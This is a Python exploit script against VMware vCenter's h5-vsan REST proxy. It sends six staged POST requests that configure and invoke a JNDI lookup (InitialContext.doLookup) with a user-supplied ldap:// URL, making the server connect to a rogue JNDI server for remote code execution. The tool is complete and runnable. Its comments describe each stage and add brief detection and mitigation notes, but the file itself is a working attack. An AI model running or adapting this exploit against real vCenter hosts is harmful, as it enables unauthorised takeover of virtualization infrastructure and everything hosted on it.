#!/usr/bin/env python3
import click
import requests
import sys
import json
import urllib3
# Silence urllib3's InsecureRequestWarning for the whole process: do_stage()
# posts with verify=False, so the server's TLS certificate is never validated
# and every request would otherwise emit this warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Command-line entry point. Sends six JSON POSTs, in a fixed order, to the
# h5-vsan REST proxy on `host` (do_stage builds the URL). Judging by the
# endpoint names, the first four configure a server-side helper with a static
# method (javax.naming.InitialContext.doLookup) and one argument, and the last
# two prepare and invoke it.
#   host    -- hostname or IP placed after "https://" by do_stage.
#   payload -- string sent as the single method argument; the usage line in
#              the docstring shows an ldap:// URL.
#   debug   -- when set, do_stage prints each response body.
# Detection notes: the traffic is six POSTs to paths under
# /ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper with the
# User-Agent "GPSTest". The User-Agent is a client-chosen value, so treat it
# as a weak indicator next to the path sequence. A JNDI lookup of an ldap://
# URL would presumably also show up as an outbound connection from the server
# to the host named in the argument, so egress filtering on the management
# host and restricted access to its web UI both limit exposure.
@click.command()
@click.argument('host')
@click.argument('payload')
@click.option('--debug', is_flag=True, help='Enable debug messages')
def exploit(host, payload, debug):
    """
    vcenter_vsan_exploit.py 10.10.10.10 ldap://10.10.10.1:1389/o=tomcat
    """
    # The docstring above is left verbatim because click prints it as the
    # --help text of the command.
    staged_calls = (
        ("/setTargetObject", '{"methodInput":[null]}'),
        ("/setStaticMethod", '{"methodInput":["javax.naming.InitialContext.doLookup"]}'),
        ("/setTargetMethod", '{"methodInput":["doLookup"]}'),
        # NOTE(review): payload is spliced into the JSON text with % before it
        # is parsed, so a value containing a double quote or a backslash
        # alters the document or makes json.loads raise.
        ("/setArguments", '{"methodInput":[["%s"]]}' % payload),
        ("/prepare", '{"methodInput":[]}'),
        # The trailing CR LF is JSON whitespace, so it does not change the
        # parsed value.
        ("/invoke", '{"methodInput":[]}\x0d\x0a'),
    )
    # Same shape as before: stage number (1-6) -> endpoint and parsed body.
    stage = {
        index: {"endpoint": path, "json": json.loads(raw_body)}
        for index, (path, raw_body) in enumerate(staged_calls, start=1)
    }
    for index in stage:
        do_stage(index, host, stage, debug)
    # Printed whenever all six requests returned without raising; do_stage
    # never inspects the HTTP status codes.
    print("[!] Exploit Complete. Check Rogue JNDI Server.")
    return ()
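def do_stage(number, host, stage, debug):
    """POST one staged request to the h5-vsan REST proxy on `host`.

    Args:
        number: key into `stage` selecting the request to send.
        host: hostname or IP; used in the URL and in the explicit Host header.
        stage: mapping of stage number to {"endpoint": path, "json": body}.
        debug: when truthy, print the response body (and any request error).

    Exits the process with status 1 if the request raises a requests
    exception. The HTTP status code of the response is not checked.
    """
    baseuri = "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper"
    headers = {'Content-Type': 'application/json', 'User-Agent': 'GPSTest', 'Host': host, 'Connection': 'close'}
    url = 'https://' + host + baseuri + stage[number]['endpoint']
    print("[+] Performing Stage", number, '(', stage[number]['endpoint'] ,') ...')
    try:
        # verify=False: the peer's TLS certificate is not validated, so the
        # identity of the answering server is never confirmed.
        req = requests.post(url=url, json=stage[number]['json'], headers=headers, verify=False)
    except requests.exceptions.RequestException as err:
        # Narrowed from a bare `except:` so that Ctrl-C and programming errors
        # are no longer reported as a network failure.
        if debug:
            print("[DEBUG] Error: ", err)
        print("[-] HTTP POST Request failed. Aborting.")
        print("[!] Ensure the vCenter host is up and the provided IP/Hostname is correct.")
        sys.exit(1)
    if debug:
        print("[DEBUG] Response: ", req.text)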
# Run the click command only when the file is executed as a script, so that
# importing the module sends no requests.
if __name__ == "__main__":
    exploit()